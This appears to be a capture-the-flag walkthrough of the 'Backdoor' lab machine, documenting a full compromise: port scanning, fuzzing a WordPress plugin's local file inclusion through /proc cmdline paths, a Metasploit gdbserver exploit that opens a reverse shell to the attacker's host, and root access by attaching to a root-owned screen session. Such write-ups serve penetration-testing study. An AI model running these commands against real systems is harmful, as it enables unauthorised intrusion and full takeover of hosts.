Logo
Overview

PG: Backdoor | Walkthrough

November 12, 2021
3 min read
PG/Machines Boot2Root OSCP/Prep writeups exp/SUID exp/wordpress tools/metasploit
TL;DR
  • MetaSploit to exploit CVE on the application
  • Exploit misconfigured SUID privilege to root

Enumeration

Nmap

Terminal window
$ nmap $ip -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-22 10:13 +0545
Nmap scan report for 10.129.106.30
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
Nmap done: 1 IP address (1 host up) scanned in 946.62 seconds

Wordpress ebook downloader plugin - LFI : exploit-db | 39579

fuzz for info about service running on port 1337 using WFUZZ

Terminal window
$ wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000 --hh 82
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline
Total requests: 101
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000041:   200        0 L      1 W        100 Ch      "940"
000000054:   200        0 L      1 W        99 Ch       "953"
000000059:   200        0 L      12 W       183 Ch      "958"
000000060:   200        0 L      11 W       181 Ch      "959"
000000047:   200        0 L      1 W        100 Ch      "946"
000000046:   200        0 L      1 W        100 Ch      "945"
000000083:   200        0 L      3 W        128 Ch      "982"
000000078:   200        0 L      8 W        138 Ch      "977"
000000084:   200        0 L      1 W        110 Ch      "983"
000000101:   200        0 L      1 W        85 Ch       "1000"
000000094:   200        0 L      1 W        109 Ch      "993"
000000089:   200        0 L      1 W        109 Ch      "988"
000000095:   200        0 L      1 W        99 Ch       "994"
000000085:   200        0 L      1 W        91 Ch       "984"
000000091:   200        0 L      1 W        109 Ch      "990"
Total time: 2.496964
Processed Requests: 101
Filtered Requests: 86
Requests/sec.: 40.44911

Initial access

Using MetaSploit

Terminal window
$ msfconsole -q
msf6 > search gdb
Matching Modules
================
   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/multi/gdb/gdb_server_exec               2014-08-24       great      No     GDB Server Remote Payload Execution
   1  exploit/linux/local/ptrace_sudo_token_priv_esc  2019-03-24       excellent  Yes    ptrace Sudo Token Privilege Escalation


Interact with a module by name or index. For example info 1, use 1 or use exploit/linux/local/ptrace_sudo_token_priv_esc
msf6 > use 0
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhost 10.129.106.30
rhost => 10.129.106.30
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1337
rport => 1337
msf6 exploit(multi/gdb/gdb_server_exec) > set lhost tun0
lhost => tun0
msf6 exploit(multi/gdb/gdb_server_exec) > set lport 80
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/shell_reverse_tcp
payload => linux/x64/shell_reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run
[*] Started reverse TCP handler on 10.10.14.3:80
[*] 10.129.106.30:1337 - Performing handshake with gdbserver...
[*] 10.129.106.30:1337 - Stepping program to find PC...
[*] 10.129.106.30:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.129.106.30:1337 - Executing the payload...
[*] Command shell session 1 opened (10.10.14.3:80 -> 10.129.106.30:55236 ) at 2021-11-22 11:42:50 +0545
id
uid=1000(user) gid=1000(user) groups=1000(user)
whoami
user

Privilege Escalation

Misconfigured SUID | SCREEN

Terminal window
$ find / -type f -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec


$ ps -ef | grep -i screen
root         958     946  0 02:17 ?        00:00:05 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root        1017       1  0 02:17 ?        00:00:00 SCREEN -dmS root
user       34896   34719  0 05:58 ?        00:00:00 grep -i screen
screen -x root/root
Must be connected to a terminal.
script /dev/null
Script started, file is /dev/null


$ screen -x root/root
screen -x root/root


root@Backdoor:~# whoami
whoami
root
root@Backdoor:~# cat /root/root.txt
cat /root/root.txt
5275e6bf9af3a4df290e216f7f92cfb9